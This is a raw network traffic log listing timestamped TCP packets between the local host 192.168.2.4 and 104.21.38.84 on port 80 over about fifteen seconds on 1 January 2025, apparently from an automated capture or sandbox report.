                                                                                                                                                                                            Jan 1, 2025 14:53:02.509027958 CET4987180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:02.509519100 CET8049879104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:02.509577990 CET4987980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:02.522223949 CET4987980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:02.527198076 CET8049879104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:02.870881081 CET4987980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:02.875760078 CET8049879104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:02.981760979 CET8049879104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:03.027081966 CET4987980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:03.178299904 CET8049879104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:03.230335951 CET4987980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:03.303900957 CET4987980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:03.304594994 CET4988480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:03.309156895 CET8049879104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:03.309384108 CET4987980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:03.309736013 CET8049884104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:03.309794903 CET4988480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:03.310058117 CET4988480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:03.314836025 CET8049884104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:03.668241978 CET4988480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:03.673154116 CET8049884104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:03.753956079 CET8049884104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:03.808332920 CET4988480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:04.063038111 CET8049884104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:04.120863914 CET4988480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:04.176742077 CET4988480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:04.177321911 CET4988980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:04.182101011 CET8049884104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:04.182230949 CET8049889104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:04.182261944 CET4988480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:04.182308912 CET4988980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:04.182439089 CET4988980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:04.187340021 CET8049889104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:04.527276039 CET4988980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:04.532217979 CET8049889104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:04.646281958 CET8049889104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:04.694961071 CET4988980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:04.815267086 CET8049889104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:04.855204105 CET4988980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.155637980 CET4986480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.159816980 CET4988980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.161204100 CET4989680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.165043116 CET8049889104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:05.165090084 CET4988980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.166115999 CET8049896104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:05.166234970 CET4989680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.166491032 CET4989680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.367023945 CET8049896104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:05.512080908 CET4989680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.517838955 CET8049896104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:05.525821924 CET4989780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.525991917 CET4989680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.530685902 CET8049897104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:05.531251907 CET4989780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.531423092 CET4989780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.536326885 CET8049897104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:05.577857018 CET8049896104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:05.692560911 CET4990280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.697360992 CET8049902104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:05.697448015 CET4990280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.697575092 CET4990280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.702313900 CET8049902104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:05.726469994 CET8049896104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:05.726546049 CET4989680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.886569023 CET4989780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:05.891573906 CET8049897104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:05.891628981 CET8049897104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:06.000952005 CET8049897104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:06.042821884 CET4990280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:06.047677040 CET8049902104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:06.058350086 CET4989780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:06.160497904 CET8049902104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:06.180035114 CET8049897104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:06.214591026 CET4990280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:06.230215073 CET4989780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:06.270431995 CET8049897104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:06.323971987 CET4989780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:06.416774988 CET8049902104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:06.464591980 CET4990280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:06.535425901 CET4989780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:06.536062002 CET4990280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:06.536065102 CET4990880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:06.540458918 CET8049897104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:06.540949106 CET8049908104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:06.541033983 CET4989780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:06.541064024 CET4990880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:06.541083097 CET8049902104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:06.541136980 CET4990280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:06.541202068 CET4990880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:06.546017885 CET8049908104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:06.886646032 CET4990880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:06.891576052 CET8049908104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:07.004755974 CET8049908104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:07.058347940 CET4990880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:07.271003008 CET8049908104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:07.324055910 CET4990880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:07.405596972 CET4991480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:07.410492897 CET8049914104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:07.410558939 CET4991480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:07.410691023 CET4991480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:07.415515900 CET8049914104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:07.761712074 CET4991480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:07.766650915 CET8049914104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:07.882718086 CET8049914104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:07.943500996 CET4991480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:08.150784016 CET8049914104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:08.205220938 CET4991480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:08.402494907 CET4990880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:08.418641090 CET4991480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:08.419280052 CET4992180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:08.424042940 CET8049914104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:08.424101114 CET4991480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:08.424176931 CET8049921104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:08.424233913 CET4992180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:08.424881935 CET4992180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:08.429685116 CET8049921104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:08.777205944 CET4992180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:08.782067060 CET8049921104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:08.873054028 CET8049921104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:08.917726040 CET4992180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:09.134896994 CET8049921104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:09.183630943 CET4992180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:09.253567934 CET4992180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:09.254085064 CET4992780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:09.258692980 CET8049921104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:09.258769989 CET4992180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:09.258900881 CET8049927104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:09.258972883 CET4992780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:09.259058952 CET4992780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:09.263938904 CET8049927104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:09.605319977 CET4992780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:09.610143900 CET8049927104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:09.708282948 CET8049927104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:09.761483908 CET4992780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:09.889786959 CET8049927104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:09.933363914 CET4992780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:10.004806995 CET4992780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:10.005451918 CET4993380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:10.009999990 CET8049927104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:10.010350943 CET8049933104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:10.010415077 CET4992780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:10.010449886 CET4993380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:10.010606050 CET4993380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:10.015448093 CET8049933104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:10.355782986 CET4993380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:10.360692978 CET8049933104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:10.463035107 CET8049933104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:10.511497974 CET4993380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:10.645745993 CET8049933104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:10.699014902 CET4993380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:10.980034113 CET4993380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:10.980992079 CET4994080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:10.985136032 CET8049933104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:10.985187054 CET4993380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:10.985867023 CET8049940104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:10.985922098 CET4994080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:10.986078024 CET4994080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:10.990885973 CET8049940104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:11.278047085 CET4994080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:11.278675079 CET4994480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:11.283515930 CET8049944104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:11.283591986 CET4994480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:11.283698082 CET4994480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:11.288516045 CET8049944104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:11.325833082 CET8049940104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:11.350601912 CET8049940104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:11.350645065 CET4994080192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:11.395467997 CET4994680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:11.400244951 CET8049946104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:11.400340080 CET4994680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:11.400451899 CET4994680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:11.405210972 CET8049946104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:11.636672974 CET4994480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:11.641581059 CET8049944104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:11.641674042 CET8049944104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:11.731230021 CET8049944104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:11.746112108 CET4994680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:11.750945091 CET8049946104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:11.777134895 CET4994480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:11.847465992 CET8049946104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:11.902261019 CET4994680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:11.914792061 CET8049944104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:11.964636087 CET4994480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:12.111871004 CET8049946104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:12.152667999 CET4994680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:12.222296000 CET4994680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:12.222296000 CET4994480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:12.222946882 CET4995280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:12.227355003 CET8049946104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:12.227478981 CET4994680192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:12.227622986 CET8049944104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:12.227792978 CET8049952104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:12.227844000 CET4994480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:12.227873087 CET4995280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:12.227947950 CET4995280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:12.232734919 CET8049952104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:12.574110031 CET4995280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:12.579046965 CET8049952104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:12.676281929 CET8049952104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:12.730287075 CET4995280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:12.947933912 CET8049952104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:12.995896101 CET4995280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:13.067511082 CET4995880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:13.072463989 CET8049958104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:13.072654009 CET4995880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:13.072679043 CET4995880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:13.077588081 CET8049958104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:13.419900894 CET4995880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:13.424779892 CET8049958104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:13.537457943 CET8049958104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:13.589649916 CET4995880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:13.793407917 CET8049958104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:13.839652061 CET4995880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:13.966342926 CET4995280192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:13.970268965 CET4995880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:13.971255064 CET4996480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:13.975192070 CET8049958104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:13.975239992 CET4995880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:13.976094961 CET8049964104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:13.976150036 CET4996480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:13.976294994 CET4996480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:13.981044054 CET8049964104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:14.324165106 CET4996480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:14.329011917 CET8049964104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:14.428893089 CET8049964104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:14.480367899 CET4996480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:14.694446087 CET8049964104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:14.745910883 CET4996480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:14.822107077 CET4996480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:14.822841883 CET4997180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:14.827110052 CET8049964104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:14.827157974 CET4996480192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:14.827754021 CET8049971104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:14.827924013 CET4997180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:14.828062057 CET4997180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:14.832916021 CET8049971104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:15.183478117 CET4997180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:15.188396931 CET8049971104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:15.299839020 CET8049971104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:15.339647055 CET4997180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:15.480200052 CET8049971104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:15.527280092 CET4997180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:15.598299980 CET4997180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:15.598886967 CET4997780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:15.603359938 CET8049971104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:15.603604078 CET4997180192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:15.603688955 CET8049977104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:15.603754997 CET4997780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:15.603885889 CET4997780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:15.608680964 CET8049977104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:15.949100018 CET4997780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:15.954056025 CET8049977104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:16.048059940 CET8049977104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:16.089667082 CET4997780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:16.229343891 CET8049977104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:16.277159929 CET4997780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:16.346750975 CET4997780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:16.347246885 CET4998380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:16.351799965 CET8049977104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:16.351892948 CET4997780192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:16.352123022 CET8049983104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:16.352184057 CET4998380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:16.352289915 CET4998380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:16.357038021 CET8049983104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:16.699131012 CET4998380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:16.703957081 CET8049983104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:16.804708004 CET8049983104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:16.855284929 CET4998380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:16.918648005 CET4998380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:16.919039965 CET4998880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:16.923660040 CET8049983104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:16.923718929 CET4998380192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:16.923928022 CET8049988104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:16.924134970 CET4998880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:16.924282074 CET4998880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:16.929075956 CET8049988104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:17.037596941 CET4998980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.042738914 CET8049989104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:17.042813063 CET4998980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.042898893 CET4998980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.047739029 CET8049989104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:17.277270079 CET4998880192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.282123089 CET8049988104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:17.282229900 CET8049988104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:17.378056049 CET8049988104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:17.402266026 CET4998980192.168.2.4104.21.38.84
                                                                                                                                                                                            Jan 1, 2025 14:53:17.407094955 CET8049989104.21.38.84192.168.2.4
                                                                                                                                                                                            Jan 1, 2025 14:53:17.433413029 CET4998880192.168.2.4104.21.38.84
